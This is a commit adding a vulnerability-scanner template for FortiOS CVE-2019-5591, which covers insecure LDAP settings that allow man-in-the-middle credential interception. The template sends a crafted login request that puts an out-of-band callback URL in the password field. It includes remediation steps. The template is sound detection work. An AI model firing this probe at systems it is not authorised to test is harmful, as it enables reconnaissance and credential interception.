Add template for CVE-2019-5591 - FortiOS - Man-in-the-Middle

http/cves/2019/CVE-2019-5591.yaml

@@ -0,0 +1,84 @@
+id: CVE-2019-5591
+
+info:
+  name: FortiGate - Insecure LDAP Configuration Detection
+  author: ayewo
+  severity: medium
+  description: |
+    Connects to FortiGate web interface and authenticates to detect insecure LDAP configurations.
+    A FortiGate is considered VULNERABLE if the LDAP configuration is missing ANY of:
+    - set ca-cert
+    - set secure ldaps
+    - set server-identity-check enable
+    Without these settings, LDAP communications are not properly secured and may be
+    susceptible to man-in-the-middle attacks or credential interception.
+    This template requires an LDAP server on the same subnet as FortiGate before an attacker 
+    can trigger an OAST callback using a user's LDAP credentials during authentication.
+  impact: |
+    Successful exploitation allows attackers on the same subnet to perform (MITM)
+    Man-in-the-Middle attacks on external LDAP authentication traffic, intercepting
+    sensitive information like credentials.
+    This vulnerability has been actively exploited by Iranian threat actors and in
+    ransomware campaigns. Requires network adjacency for exploitation.
+  remediation: |
+    Enable LDAP server identity verification:
+    1. Configure LDAP server certificate: set ca-cert <ldap-server-certificate>
+    2. Enable secure LDAP: set secure ldaps
+    3. Enable server identity check: set server-identity-check enable
+  reference:
+    - https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
+    - https://www.fortiguard.com/psirt/FG-IR-19-037
+    - https://www.tenable.com/blog/frequently-asked-questions-about-iranian-cyber-operations
+    - https://www.hhs.gov/sites/default/files/iranian-threat-actors-and-healthcare.pdf
+    - https://cert-in.org.in/PDF/RANSOMWARE_Report_2022.pdf
+    - https://www.ic3.gov/media/news/2021/210527.pdf
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-5591
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2019-5591
+    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fortinet
+    product: fortigate
+    shodan-query:
+      - cpe:"cpe:2.3:o:fortinet:fortios"
+    tags: fortinet,fortigate,fortios,ldap,mitm,misconfig,insecure,kev,cve,cve2019
+
+variables:
+  username: "{{rand_text_alpha(10)}}"
+  password: "{{rand_text_alphanumeric(12)}}"
+
+http:
+  - id: trigger-ldap-auth
+    raw:
+      - |
+        POST /logincheck HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain;charset=UTF-8
+        Pragma: no-cache
+        Accept: */*
+        If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
+        Accept-Language: en-GB,en;q=0.9
+        Cache-Control: no-store, no-cache, must-revalidate
+        Accept-Encoding: gzip, deflate
+        Origin: {{BaseURL}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+        Referer: {{BaseURL}}/login
+        Connection: keep-alive
+
+        ajax=1&username={{username}}&secretkey={{interactsh-url}}
+
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+          - "http"